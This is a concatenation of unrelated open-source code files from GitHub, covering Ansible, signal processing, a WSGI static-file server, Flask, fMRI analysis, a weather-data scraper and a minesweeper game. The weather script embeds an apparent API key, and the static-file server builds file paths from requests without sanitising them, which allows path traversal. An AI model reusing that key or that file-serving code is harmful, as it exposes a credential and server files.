self.module.atomic_move(tmp_path, self.sysctl_file)\n\n\n# ==============================================================\n# main\n\ndef main():\n\n # defining module\n module = AnsibleModule(\n argument_spec=dict(\n name=dict(aliases=['key'], required=True),\n value=dict(aliases=['val'], required=False, type='str'),\n state=dict(default='present', choices=['present', 'absent']),\n reload=dict(default=True, type='bool'),\n sysctl_set=dict(default=False, type='bool'),\n ignoreerrors=dict(default=False, type='bool'),\n sysctl_file=dict(default='/etc/sysctl.conf', type='path')\n ),\n supports_check_mode=True,\n required_if=[('state', 'present', ['value'])],\n )\n\n if module.params['name'] is None:\n module.fail_json(msg=\"name cannot be None\")\n if module.params['state'] == 'present' and module.params['value'] is None:\n module.fail_json(msg=\"value cannot be None\")\n\n # In case of in-line params\n if module.params['name'] == '':\n module.fail_json(msg=\"name cannot be blank\")\n if module.params['state'] == 'present' and module.params['value'] == '':\n module.fail_json(msg=\"value cannot be blank\")\n\n result = SysctlModule(module)\n\n module.exit_json(changed=result.changed)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"openshift/openshift-ansible","sub_path":"roles/openshift_node/library/sysctl.py","file_name":"sysctl.py","file_ext":"py","file_size_in_byte":15277,"program_lang":"python","lang":"en","doc_type":"code","stars":2139,"dataset":"github-code","pt":"66"} +{"seq_id":"3461536724","text":"'''\n@date: 2021.03.09\n@author: Ruixin Lee\nThis file is for implementations of several kinds of Fourier Transform,\nsuch as Fast Fourier Transform, Short-Time Fourier Transform and so on.\n对于MAHNOB-HCI数据集来说,一个文件代表的是 119s 的数据采集。眼动数据集每秒60个样本,采样率60Hz。\n其实是接近120s,但是第一秒没到60个,所以一般从第2s开始计算。所以是119秒\n\n这个文件要做的主要就是,将这瞳孔直径信号分为 
4个 频率的波,并且计算对应的功率。其实也就是计算瞳孔直径的PSD特征。\n最终,\n'''\n\n\nimport scipy as sp\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\ndef MySTFT_V1():\n '''\n reference: https://www.cnblogs.com/klchang/p/9280509.html\n :return: None\n '''\n import scipy.io.wavfile\n # Read wav file\n # \"OSR_us_000_0010_8k.wav\" is downloaded from http://www.voiptroubleshooter.com/open_speech/american.html\n sample_rate, signal = scipy.io.wavfile.read(\"OSR_us_000_0010_8k.wav\")\n # print(\"sample rate:\\n\", sample_rate) # sample rate is 8000.\n\n # Get speech data in the first 2 seconds\n # sample rate is 8000, here the length of list of the signal is 1600, [0, 2×8000).\n signal = signal[0:int(2. * sample_rate)] # input signal --> 2 seconds,提取前2秒的信号\n\n print(\"signal:\\n\", signal, \"\\nsignal type:\\n\", type(signal), \"\\nsignal length:\\n\", len(signal))\n # one dimensional array, type: , length: 1600\n\n # Calculate the short time fourier transform\n pow_spec = stft_calculation(signal, sample_rate)\n # print(\"power spectral density:\\n\", pow_spec)\n print(\"power spectral density:\\n\", pow_spec,\n \"\\npow_spec type:\\n\", type(pow_spec), \"\\npow_spec length y:\\n\", len(pow_spec),\n \"\\npow_spec x:\", len(pow_spec[0]))\n\n plt.imshow(pow_spec)\n plt.tight_layout()\n plt.show()\n\n # print(\"END!!!\")\n\n return None\n\n\n# sample_rate = 60Hz\ndef sample_rate_calculation(filepath=None):\n '''\n 该函数能够利用时间戳计算存储在某种信号的文本文件中的采样率\n 该函数暂时默认仅用于MAHNOB-HCI-TAGGING数据集的眼动采样频率计算\n :return: 采样率 sample_rate\n '''\n sample_rate = 0\n df = pd.DataFrame(pd.read_csv(filepath))\n time_stamp = df['Timestamp']\n print(type(time_stamp))\n time_stamp = np.array(time_stamp)\n print(type(time_stamp))\n print(time_stamp)\n return sample_rate\n\n\ndef MySTFT_V2(filepath=None):\n sample_rate = 60 # 眼动信号的采样频率为60Hz\n signal_file = pd.DataFrame(pd.read_csv(filepath))\n signal_file['PupilDiameter'] = signal_file['PupilRight']-signal_file['PupilLeft']\n # 得到'PupilDiameter'列后,开始计算\n signal = np.abs(np.array(signal_file['PupilDiameter']))\n print(\"signal:\\n\", signal)\n # print(\"sample rate:\\n\", sample_rate) # sample rate is 8000.\n # Get speech data in the first 2 seconds\n # sample rate is 8000, here the length of list of the signal is 1600, [0, 2×8000).\n signal = signal[0:int(2. 
* sample_rate)] # input signal --> 2 seconds,提取前2秒的信号\n print(\"signal:\\n\", signal, \"\\nsignal type:\\n\", type(signal), \"\\nsignal length:\\n\", len(signal))\n # one dimensional array, type: , length: 1600\n # Calculate the short time fourier transform\n pow_spec = stft_calculation(signal=signal, sample_rate=60, frame_size=0.025, frame_stride=0.05)\n # print(\"power spectral density:\\n\", pow_spec)\n print(\"power spectral density:\\n\", pow_spec,\n \"\\npow_spec type:\\n\", type(pow_spec), \"\\npow_spec length y:\\n\", len(pow_spec),\n \"\\npow_spec x:\", len(pow_spec[0]))\n plt.imshow(pow_spec)\n plt.tight_layout()\n plt.show()\n print(\"END!!!\")\n return None\n\n\ndef stft_calculation(signal, sample_rate=16000, frame_size=0.025, # frame_size设置为 25ms,即0.025s\n frame_stride=0.01, winfunc=np.hamming, NFFT=512):\n '''\n :param signal: 输入的信号,这里是一个一维数组\n :param sample_rate: 采样频率,又称采样率,每秒采集的样本的数量,单位是赫兹(Hz)\n :param frame_size: 将信号分为较短的帧的尺寸size,在语音处理中,通常帧大小在 20ms 到 40ms之间\n :param frame_stride: 相邻帧的滑动尺寸或跳跃尺寸,通常帧的滑动尺寸在 10ms到 20ms之间,这里设置为 10ms,即 0.01s\n :param winfunc: 窗函数采用汉明窗函数 (Hamming Function)\n :param NFFT: 在每一帧,进行512点快速傅里叶变换,即NFFT==512\n :return: pow_frames\n '''\n # Calculate the number of frames from the signal\n # frame_size指每次提取的大小,也就是每个“帧”的大小,每次选取一定时间内的信号。\n # 比如,frame_size==1,则选取一秒内的信号。而采样频率若为50Hz,则一共有1×50个信号,如果是2秒,且采样率为50Hz,则2×50==100个信号样本。\n frame_length = frame_size * sample_rate # 样本的长度,这里是0.025×8000==200,即每次200个信号样本\n frame_step = frame_stride * sample_rate # 步长frame_step,用每次滑动的尺寸乘以采样率来获得。\n signal_length = len(signal)\n frame_length = int(round(frame_length))\n frame_step = int(round(frame_step))\n print(\"frame step: \", frame_step)\n\n delta_length = float(np.abs(signal_length-frame_length))\n num_frames = int(np.ceil(delta_length/frame_step)) + 1\n\n # zero padding\n pad_signal_length = num_frames * frame_step + frame_length\n z = np.zeros((pad_signal_length - signal_length))\n # Pad signal to make sure that all frames have equal number of samples\n # without truncating any samples from the original signal\n pad_signal = np.append(signal, z)\n\n # Slice the signal into frames from indices\n np_title_1 = np.tile(np.arange(0, frame_length), (num_frames, 1))\n np_title_2 = np.tile(np.arange(0, num_frames * frame_step, frame_step), (frame_length, 1)).T\n indices = np_title_1 + np_title_2\n\n frames = pad_signal[indices.astype(np.int32, copy=False)]\n # Get windowed frames\n frames *= winfunc(frame_length)\n # Compute the one-dimensional n-point discrete Fourier Transform(DFT) of\n # a real-valued array by means of an efficient algorithm called Fast Fourier Transform (FFT)\n mag_frames = np.absolute(np.fft.rfft(frames, NFFT))\n # Compute power spectrum\n pow_frames = (1.0/NFFT) * (mag_frames**2)\n\n print(\"pow_frames:\\n\", type(pow_frames))\n print(pow_frames.shape) # (41, 257)\n print(pow_frames)\n\n return pow_frames\n\n\nif __name__ == '__main__':\n # MySTFT_V1()\n # sample_rate_calculation(filepath='../../data/mahnob_example/2/P1-Rec1-All-Data-New_Section_2.csv')\n # pass\n MySTFT_V2(filepath='../../data/mahnob_example/2/P1-Rec1-All-Data-New_Section_2.csv')\n","repo_name":"Breeze1in1drizzle/MindLink-Explorer","sub_path":"MindLink-Eumpy/test/JointTimeFrequencyAnalysis/MyFT.py","file_name":"MyFT.py","file_ext":"py","file_size_in_byte":6904,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"66"} +{"seq_id":"14778549743","text":"from re import compile\nfrom os.path import join, isfile, isdir, islink\nfrom os import 
listdir\nfrom mimetypes import guess_type\nfrom cStringIO import StringIO\nfrom xml.sax.saxutils import quoteattr\n\n\nclass _FileIter(object):\n\tdef __init__(self, path, buffersize):\n\t\tself.path = path\n\t\tself.buffersize = buffersize\n\n\tdef __iter__(self):\n\t\tself.f = open(self.path, \"rb\")\n\t\treturn self\n\n\tdef next(self):\n\t\twhile True:\n\t\t\tblock = self.f.read(self.buffersize)\n\t\t\tif not block:\n\t\t\t\traise StopIteration\n\t\t\treturn block\n\n\tdef close(self):\n\t\tif hasattr(self, \"f\"):\n\t\t\tself.f.close()\n\n\nclass StaticFiles(object):\n\t\"\"\" A WSGI static file/folder serving application.\n\n\t@cvar DEFAULT_CONTENT_TYPE: The default content-type used when\n\t\t\tcontent-type cannot be guessed.\n\t\"\"\"\n\tDEFAULT_CONTENT_TYPE = \"application/octet-stream\"\n\tdef __init__(self, root_folder, prefix=\"\",\n\t\t\t\tpattern=\".*\", buffersize=2048, follow_symlinks=False):\n\t\t\"\"\"\n\t\tUsage\n\t\t=====\n\t\t\t>>> app = StaticFiles(\"/my/shared/folder\")\n\n\t\t\tAnd run \"app\" on a wsgi gateway.\n\n\n\t\t@param root_folder: the folder from where to serve files.\n\t\t@param pattern: A regular expression. Only files matching it\n\t\t\t\twill be shown.\n\t\t@param buffersize: The buffersize used when reading files.\n\t\t@param follow_symlinks: Follow symlinks?\n\t\t\"\"\"\n\t\tself.patt = compile(pattern)\n\t\tself.root_folder = root_folder\n\t\tself.buffersize = buffersize\n\t\tself.prefixlen = len(prefix)\n\t\tself.follow_symlinks = follow_symlinks\n\n\n\tdef handle_notfound(self, env, start_response, path):\n\t\t\"\"\" Invoked by __call__ when a file that does not exist is requested.\n\t\t@param env: The WSGI environ dict sent to __call__.\n\t\t@param start_response: The start_response callable sent to __call__.\n\t\t@param path: The requested path without prefix.\n\t\t\"\"\"\n\t\tstart_response(\"404 not found\", [(\"content-type\", \"text/plain\")])\n\t\treturn [\"%s does not exist\" % path]\n\n\tdef list_directory(self, env, start_response, path):\n\t\t\"\"\" Invoked by __call__ when a directory is requested. \"\"\"\n\t\tif path.endswith(\"/\"):\n\t\t\tpath = path[:-1]\n\t\tfolder = join(self.root_folder, path)\n\t\tbuf = StringIO()\n\t\tprint >> buf, \"\"\n\t\tprint >> buf, \"
<html><head><title>%s%s</title></head>\" % (env[\"SCRIPT_NAME\"],\n\t\t\t\tenv[\"PATH_INFO\"])\n\t\tprint >> buf, \"<body>
        \"\n\t\tprint >> buf, \"\"\n\n\t\tstart_response(\"200 OK\", [(\"content-type\", \"text/html\")])\n\t\treturn [buf.getvalue()]\n\n\n\tdef __call__(self, env, start_response):\n\t\tpath = env[\"SCRIPT_NAME\"] + env[\"PATH_INFO\"]\n\t\tpath = path[self.prefixlen:]\n\t\tif path.startswith(\"/\"):\n\t\t\tpath = path[1:]\n\t\treal_path = join(self.root_folder, path)\n\n\t\tif islink(real_path) and not self.follow_symlinks:\n\t\t\treturn self.handle_notfound(env, start_response, path)\n\n\t\tif not self.patt.match(path):\n\t\t\treturn self.handle_notfound(env, start_response, path)\n\n\t\tif isdir(real_path):\n\t\t\treturn self.list_directory(env, start_response, path)\n\t\telif isfile(real_path):\n\t\t\tcontent_type = guess_type(real_path)[0] \\\n\t\t\t\t\tor self.DEFAULT_CONTENT_TYPE\n\t\t\tstart_response(\"200 OK\", [(\"content-type\", content_type)])\n\t\t\treturn _FileIter(real_path, self.buffersize)\n\n\t\treturn self.handle_notfound(env, start_response, path)\n","repo_name":"espenak/enkel","sub_path":"enkel/batteri/staticfiles.py","file_name":"staticfiles.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"35703723484","text":"#!/usr/bin/env python3.6\n# coding:utf-8\n# maxiaobo\n# 2019/05/24\n\nimport logging\nimport time\nimport os\n\ncur_dir = os.path.dirname(__file__)\n\nlog_path = os.path.dirname(os.path.dirname(os.path.abspath(cur_dir))) + \"/rocketmq_query_service/logs/\"\nif not os.path.isdir(log_path):\n os.mkdir(log_path)\nlog_filename = log_path + \"rocketmq-query-backend-\" + time.strftime('%Y%m%d') + \".log\"\n\n\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n filename=log_filename,\n filemode='a')\n\n\nlog = logging.getLogger('root')\n","repo_name":"hnzjCoder/rocketmq_query","sub_path":"libs/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24631177826","text":"# What is the largest prime factor of the number 600851475143 ?\n\n\ndef prime_factors(n):\n factors = [1]\n last = n\n\n while last > 1:\n c = 2\n while last % c > 0:\n c += 1\n\n factors.append(c)\n last /= c\n return factors\n\nanswer = max(prime_factors(600851475143))\n","repo_name":"Roasbeef/Project-Euler-Solutions-","sub_path":"1-10/p_3.py","file_name":"p_3.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"24727834846","text":"\"\"\" A base class \"\"\"\n\n\nclass Base:\n \"\"\" A base class from which all other classes inherit \n Attributes:\n nb_objects: Number of instantiated objects of the class\n \"\"\"\n __nb_objects = 0\n\n\n def __init__(self, id=None):\n \"\"\" Instantiation of the base class\n Args:\n id(int): the id of the new base.\n \"\"\"\n if id != None:\n self.id = id\n else:\n Base.__nb_objects += 1\n self.id = Base.__nb_objects\n\n","repo_name":"Efeoseaje/alx_python","sub_path":"python-almost_a_circle/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"25347282603","text":"# What has the temp been like on Christmas in NYC from 2000-2015?\n# import csv and request modules\nimport csv\nimport requests\n\n# set 
up URL for request\nendpoint = 'https://api.darksky.net/forecast/'\napi_key = 'da5d52438b53e27259e8e2bdc2f7c51f'\nlat = '40.7128'\nlon= '-73.9352'\n\n# open file in write mode\ncsvfile= open('dataproject2.csv', 'w')\n\n# create the csv writer\ncsvwriter= csv.writer(csvfile, delimiter= ',')\ncsvwriter.writerow(['year', 'temp'])\n\nfor y in range(2000,2015):\n time = '%d-12-25T12:00:00' % y\n \n # url for request\n url = endpoint + api_key + '/' + lat + ',' + lon + ',' + time\n \n # make request\n r = requests.get(url)\n weather = r.json()\n temp = weather['hourly']['data'][0]['temperature']\n print(temp)\n csvwriter.writerow([y, temp])\n \ncsvfile.close()\n","repo_name":"UCMHSProgramming16-17/final-project-shefalidahiya","sub_path":"final-project-shefalidahiya/dataproject2.py","file_name":"dataproject2.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"1572747938","text":"import visualizations.plot_relational_coding as plot\nimport visualizations.plot_snr_measurement as plot_snr\nimport visualizations.plot_temporal_relational_coding_window as plot_window\nfrom data_center.static_data.static_data import StaticData\nfrom enums import DataType, FlowType\nfrom flow_manager import FlowManager\n\n# load dictionary to static class members\nStaticData.inhabit_class_members()\n\n\ndef relation_coding_for_all_roi(avg_data: bool = False, with_plot: bool = False, group: str = '',\n shuffle: bool = False):\n for roi in StaticData.ROI_NAMES:\n fm = FlowManager()\n fm.execute(DataType.FMRI, roi, avg_data, group, shuffle, flow_type=FlowType.RELATIONAL_CODING)\n del fm\n\n if with_plot:\n if avg_data:\n plot.plot_pipe_avg(roi, group, shuffle)\n else:\n plot.plot_pipe(roi)\n\n\ndef relation_coding_for_specific_roi(roi, avg_data: bool = False, with_plot: bool = False):\n fm = FlowManager()\n fm.execute(DataType.FMRI, roi, avg_data, flow_type=FlowType.RELATIONAL_CODING)\n if with_plot:\n if avg_data:\n plot.plot_pipe_avg(roi)\n else:\n plot.plot_pipe(roi)\n\n\ndef activations_pattern_for_all_roi(group, with_plot: bool = False):\n for roi in StaticData.ROI_NAMES:\n fm = FlowManager()\n fm.execute(DataType.FMRI, roi, group, flow_type=FlowType.ACTIVATIONS_PATTERNS)\n del fm\n if with_plot:\n plot.plot_activation_pattern(roi, group)\n\n\ndef activations_pattern_for_specific_roi(roi, group, with_plot: bool = False):\n fm = FlowManager()\n fm.execute(DataType.FMRI, roi, group, flow_type=FlowType.ACTIVATIONS_PATTERNS)\n if with_plot:\n plot.plot_activation_pattern(roi, group)\n\n\ndef singular_relational_coding(group, with_plot: bool = False):\n for roi in StaticData.ROI_NAMES:\n fm = FlowManager()\n fm.execute(DataType.FMRI, group, flow_type=FlowType.SINGULAR_RELATIONAL_CODING)\n del fm\n\n\ndef singular_relational_coding_for_specific_roi(roi, group, with_plot: bool = False):\n fm = FlowManager()\n fm.execute(DataType.FMRI, roi, group, flow_type=FlowType.SINGULAR_RELATIONAL_CODING)\n\n\ndef custom_temporal_relational_coding_for_specific_roi(roi, rest_ws, task_ws, with_plot: bool = False):\n fm = FlowManager()\n fm.execute(DataType.FMRI, roi, rest_ws, task_ws, flow_type=FlowType.CUSTOM_TEMPORAL_RELATIONAL_CODING)\n if with_plot:\n plot.custom_window_rc_histogram(roi=roi, rest_window=rest_ws, task_window=task_ws)\n\n\ndef custom_temporal_relational_coding(rest_ws, task_ws, with_plot: bool = False):\n for roi in StaticData.ROI_NAMES:\n fm = FlowManager()\n fm.execute(DataType.FMRI, roi, rest_ws, task_ws, 
flow_type=FlowType.CUSTOM_TEMPORAL_RELATIONAL_CODING)\n del fm\n\n if with_plot:\n plot.custom_window_rc_histogram(roi=roi, rest_window=rest_ws, task_window=task_ws)\n\n\ndef moving_window_custom_temporal_relational_coding(**kwargs):\n if isinstance(kwargs.get('roi'), list):\n rois = kwargs.pop('roi')\n\n elif kwargs.get('roi'):\n rois = [kwargs.pop('roi')]\n\n else:\n rois = StaticData.ROI_NAMES\n\n avg_data = kwargs.get('average_data')\n for init_window in ['end']:\n task_ws = 10\n rest_s, rest_e = (0, 5)\n while rest_e < 30:\n rest_ws = rest_s, rest_e\n for roi in rois:\n fm = FlowManager()\n fm.execute(DataType.FMRI, roi, rest_ws, init_window, task_ws,\n flow_type=FlowType.CUSTOM_TEMPORAL_RELATIONAL_CODING, **kwargs)\n del fm\n\n print('done window', rest_ws)\n rest_s += 1\n rest_e += 1\n\n if kwargs.get('with_plot'):\n plot_window.window_relational_coding_plot(task_window=init_window, show=True, save_img=True,\n avg_data=avg_data, roi=rois)\n if kwargs.get('with_bar'):\n plot_window.window_average_rc_bar_plot(avg_data=avg_data, with_shuffle=True, save_img=True)\n\n\ndef isfc_relational_coding(with_plot=None):\n for roi in StaticData.ROI_NAMES:\n fm = FlowManager()\n fm.execute(DataType.FMRI, roi, flow_type=FlowType.ISFC_RELATIONAL_CODING)\n del fm\n\n if with_plot:\n plot.plot_pipe(roi)\n\n\ndef moving_window_custom_temporal_relational_coding_with_signal_processing(\n roi,\n average_data,\n shuffle,\n filtering,\n decomposition,\n with_plot\n):\n for init_window in ['end']:\n task_ws = 10\n rest_s, rest_e = (0, 5)\n while rest_e < 19:\n rest_ws = rest_s, rest_e\n # for roi in StaticData.ROI_NAMES:\n fm = FlowManager()\n fm.execute(\n DataType.FMRI,\n roi,\n rest_ws,\n init_window,\n task_ws,\n avg_data=average_data,\n shuffle_rest=shuffle,\n filtering=filtering,\n decomposition=decomposition,\n filter_order=10,\n filter_cut_off=0.09,\n flow_type=FlowType.CUSTOM_TEMPORAL_RELATIONAL_CODING\n )\n del fm\n rest_s += 1\n rest_e += 1\n print(rest_ws)\n if with_plot:\n plot_window.window_relational_coding_plot(\n roi=roi,\n task_window=init_window,\n mode='pca' if decomposition else 'filtering',\n show=True,\n save_img=True,\n avg_data=average_data,\n filter_order=30,\n filter_cut_off=0.3,\n )\n\n\ndef snr_measurement(**kwargs):\n rois = kwargs.get('roi')\n\n if rois and not isinstance(rois, list):\n rois = [kwargs.get('roi')]\n\n elif not rois:\n rois = StaticData.ROI_NAMES\n\n for init_window in ['end']:\n for group_index in [1, 2, 3, 4, 5, 6]:\n task_ws = 10\n rest_s, rest_e = (0, 5)\n while rest_e < 19:\n rest_ws = rest_s, rest_e\n for roi in rois:\n fm = FlowManager()\n fm.execute(\n DataType.FMRI,\n roi=roi,\n rest_ws=rest_ws,\n init_window=init_window,\n window_moving_size=10,\n # window_range=(10,20),\n task_ws=task_ws,\n group_index=group_index,\n group_subjects=35,\n skip_correlation=False,\n movie_distances=True,\n movie_activation=False,\n shuffle_rest=False,\n flow_type=FlowType.SNR_MEASUREMENTS\n )\n del fm\n rest_s += 1\n rest_e += 1\n\n\n\n\n print('done group i', group_index)\n print('done window', init_window)\n\n if kwargs.get('plot'):\n plot_snr.plot_snr_measurement(\n group_index,\n save_figure=False,\n plot_combined_groups=True,\n plot_heatmap=False,\n max=True\n )\n\n\nif __name__ == '__main__':\n # relation_coding_for_specific_roi()\n # relation_coding_for_all_roi(avg_data=True, with_plot=True, group='_GROUP2')\n # relation_coding_for_all_roi(avg_data=True, with_plot=True, group='_GROUP1')\n # activations_pattern_for_specific_roi('RH_Default_pCunPCC_6', 
group='_GROUP2', with_plot=True)\n # activations_pattern_for_all_roi(group='', with_plot=True)\n # singular_relational_coding_for_specific_roi('RH_Default_pCunPCC_6', group='')\n # custom_temporal_relational_coding_for_specific_roi(roi='RH_Vis_18',rest_ws=(8, 13), task_ws=10, with_plot=False)\n # custom_temporal_relational_coding(rest_ws=(6, 16), task_ws=10, with_plot=True)\n # moving_window_custom_temporal_relational_coding(with_plot=True)\n\n # relation_coding_for_all_roi(avg_data=True, shuffle=True, with_plot=True)\n\n # moving_window_custom_temporal_relational_coding(average_data=True, shuffle=True, with_plot=False, with_bar=False)\n # moving_window_custom_temporal_relational_coding(average_data=False, shuffle=True, with_plot=False, with_bar=False)\n # moving_window_custom_temporal_relational_coding_with_signal_processing(\n # roi='',\n # average_data=False,\n # shuffle=False,\n # filtering=False,\n # decomposition=True,\n # with_plot=True,\n # )\n\n # moving_window_custom_temporal_relational_coding_with_signal_processing(\n # roi='RH_Default_Temp_6',\n # average_data=False,\n # shuffle=False,\n # filtering=True,\n # decomposition=False,\n # with_plot=True\n # )\n # isfc_relational_coding(with_plot=1)\n snr_measurement(roi='RH_DorsAttn_Post_2')\n # # activations_pattern_for_specific_roi(roi='RH_Default_pCunPCC_1', group='_GROUP2', with_plot=True)\n # moving_window_custom_temporal_relational_coding(\n # # roi=['RH_Default_pCunPCC_1', 'LH_Default_PFC_15', 'RH_Default_Par_1'],\n # average_data=True,\n # shuffle=False,\n # with_plot=True,\n # with_bar=False\n # )","repo_name":"NivYahavMilo/fmri_relational_coding","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"15519792745","text":"# Write a program that extracts links from a given text. The text will come in the form of strings, each representing a\n# sentence. You need to extract only the valid links from it. Example:\nimport re\npattern = r'\\www\\.[A-Za-z0-9-]+(\\.[a-z]+)+'\nline = input()\nwhile line:\n\tresult = re.finditer(pattern, line)\n\tfor c in result:\n\t\tif c.group():\n\t\t\tprint(c.group())\n\n\tline = input()","repo_name":"Pavel-Petkov03/SoftuniHomeworks","sub_path":"02.Programming Fundamentals with Python/03. Основни задачи/Задачи/18. Exercise Regular Expressions/06. Extract the Links.py","file_name":"06. Extract the Links.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"16775963508","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[6]:\n\n\n# Goal is to reproduce NFW and cored (mleft=1) in fig 4 in https://arxiv.org/pdf/2106.09050.pdf\n\nfrom colossus.cosmology import cosmology\nimport numpy as np\nimport matplotlib.pyplot as plt\nget_ipython().run_line_magic('matplotlib', 'inline')\nfrom colossus.halo import mass_so\nfrom colossus.halo import mass_defs\nfrom colossus.halo import mass_adv\nfrom colossus.halo import profile_nfw\nfrom colossus.halo import profile_einasto\nfrom colossus.halo import concentration\nfrom scipy.integrate import quad\n\ncosmo = cosmology.setCosmology('planck18')\n\n#They start with Mvir=M200=1e9Msun. 
Derive R200, c200, r_s, and generate a list of radial values for the plot\n\nM200 = 1E9\nR200 = mass_so.M_to_R(M200, 1, '200c')\nc200 = concentration.concentration(M200, '200c', 1, 'diemer19')\nr_s = R200/c200\nr = np.linspace(1e-3, R200, 1500)\n\n# Define density functions and integrate out to R200 to obtain enclosed mass functions\n\ndef rho_prof_NFW(r, C):\n return C / ((r/r_s)*((1+r/r_s)**2))\n\ndef rho_prof_CORED(r, C):\n return C / ((1+(r/r_s)**3))\n\nresult1, _ = quad(lambda r: 4*np.pi*rho_prof_NFW(r, 1)*r**2, 1e-3, R200)\nC1 = M200/result1\n\nresult2, _ = quad(lambda r: 4*np.pi*rho_prof_CORED(r, 1)*r**2, 1e-3, R200)\nC2 = M200/result2\n\nMenc_NFW = np.array([])\nfor i in r:\n result1, _ = quad(lambda r: 4*np.pi*rho_prof_NFW(r, C1)*r**2, 1e-3, i)\n Menc_NFW = np.append(Menc_NFW, result1)\n \nMenc_CORED = np.array([])\nfor i in r:\n result2, _ = quad(lambda r: 4*np.pi*rho_prof_CORED(r, C2)*r**2, 1e-3, i)\n Menc_CORED = np.append(Menc_CORED, result2)\n\n# Plot enclosed mass vs distance from center \n \nplt.figure()\nplt.loglog()\nplt.xlabel('r/r200')\nplt.ylabel('M((km/s)')\nplt.plot(M200, sigma_los_NFW, '-', label = 'NFW');\nplt.plot(M200, sigma_los_CORED, '-', label = 'cored');\nplt.gca().set_yticks([1e0, 1e1])\nplt.gca().set_xticks([1e8, 1e9, 1e10, 1e11])\nplt.legend();\n\n\n# In[3]:\n\n\nx = .234*np.random.poisson(0, 25)\nprint(x)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"DivinaIsCool/Su23","sub_path":"Fig4 Reproduce (2).py","file_name":"Fig4 Reproduce (2).py","file_ext":"py","file_size_in_byte":4428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"32180017228","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Time : 2020/11/30 23:00\n# @Author : QXTD-LXH\n# @Desc :\nimport flask\nfrom chat import Chat\nimport traceback\nimport json\nfrom cfg import get_logger\n\nserver = flask.Flask(__name__)\nlogger = get_logger()\nmodel = Chat(logger)\n\n\n@server.route('/qianyan', methods=['get', 'post'])\ndef qianyan():\n try:\n sample = flask.request.args.get('input')\n # sample = flask.request.get_data()\n logger.info('Data: {}'.format(sample))\n sample = json.loads(sample)\n response = model.chat(sample)\n logger.info('Response: {}'.format(response))\n return response\n except Exception as e:\n exc_info = 'Cal Exception: {}'.format(e)\n logger.info('Exception: {}'.format(traceback.format_exc()))\n logger.info('exc info: {}'.format(exc_info))\n return flask.jsonify({\n \"error code\": 1,\n \"response\": \"error: {}\".format(exc_info)\n })\n\n\n@server.route('/test', methods=['get', 'post'])\ndef test():\n return 'Success !!'\n\n\n# you pig\nserver.run(port=2112, debug=False, host='0.0.0.0', threaded=True)\n","repo_name":"apple55bc/CCF-BDCI-qianyan","sub_path":"code/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"68"} +{"seq_id":"3605107503","text":"\nimport turtle\nimport random\n\nclass Cell:\n def __init__(self,xmin=0,ymin=0,width=1,height=1):\n self.__xmin = xmin\n self.__ymin = ymin\n self.__xmax = self.__xmin + width\n self.__ymax = self.__ymin + height\n self.__t = turtle.Turtle()\n self.__t.hideturtle()\n self.__t.speed(0)\n self.__bomb = False\n self.__cleared = False\n\n\n def isIn(self,x,y):\n if x > self.__xmin and x < self.__xmax and y > self.__ymin and y < self.__ymax:\n return True\n\n else:\n return False\n\n def setBomb(self):\n self.__bomb = True\n\n def isBomb(self):\n 
return self.__bomb\n\n\n def clear(self):\n self.__cleared = True\n self.draw()\n\n def isCleared(self):\n return self.__cleared\n\n\n def showcount(self,c):\n centerx = (self.__xmax + self.__xmin)/2\n centery = (self.__ymax + self.__ymin)/2\n self.__t.penup()\n self.__t.goto(centerx,centery)\n self.__t.write(c,align=\"center\", font=(\"Arial\",10,\"normal\"))\n\n def draw(self):\n self.__t.hideturtle()\n self.__t.penup()\n self.__t.goto(self.__xmin,self.__ymin)\n\n if self.isBomb():\n self.__t.pendown()\n self.__t.fillcolor(\"red\")\n self.__t.begin_fill()\n self.__t.goto(self.__xmax,self.__ymin)\n self.__t.goto(self.__xmax,self.__ymax)\n self.__t.goto(self.__xmin,self.__ymax)\n self.__t.goto(self.__xmin,self.__ymin)\n self.__t.end_fill()\n self.__t.penup()\n centerx = (self.__xmax + self.__xmin)/2\n centery = (self.__ymax + self.__ymin)/2\n self.__t.goto(centerx,centery)\n self.__t.write(\"*\",font=(\"Arial\",10,\"normal\"))\n\n\n elif self.isCleared():\n self.__t.pendown()\n self.__t.fillcolor(\"gray\")\n self.__t.begin_fill()\n self.__t.goto(self.__xmax,self.__ymin)\n self.__t.goto(self.__xmax,self.__ymax)\n self.__t.goto(self.__xmin,self.__ymax)\n self.__t.goto(self.__xmin,self.__ymin)\n self.__t.end_fill()\n\n\n else:\n self.__t.pendown()\n self.__t.fillcolor(\"green\")\n self.__t.begin_fill()\n self.__t.goto(self.__xmax,self.__ymin)\n self.__t.goto(self.__xmax,self.__ymax)\n self.__t.goto(self.__xmin,self.__ymax)\n self.__t.goto(self.__xmin,self.__ymin)\n 